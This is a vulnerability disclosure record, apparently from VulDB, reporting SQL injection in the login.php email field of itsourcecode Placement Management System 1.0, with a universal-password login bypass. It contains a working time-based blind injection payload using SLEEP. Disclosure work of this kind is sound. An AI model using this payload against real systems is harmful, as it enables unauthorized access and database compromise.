| Title | itsourcecode Placement Management System 1.0 SQLi |
|---|
| Description | In the login.php file, the email field is not properly sanitized, which may lead to SQL injection vulnerabilities. Additionally, as long as there is any data in the users table of the database, it is possible to log in using a universal password.
————————Poc————————————
Parameter: email (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: [email protected]#' AND (SELECT 3451 FROM (SELECT(SLEEP(5)))zIEe) AND 'NilV'='NilV&pass=123 |
|---|
| Source | ⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE11-1.md |
|---|
| User | Dee.Mirage (UID 71702) |
|---|
| Submission | 07/31/2024 16:15 (2 years ago) |
|---|
| Moderation | 08/03/2024 08:49 (3 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 273540 [itsourcecode Placement Management System 1.0 login.php email sql injection] |
|---|
| Points | 20 |
|---|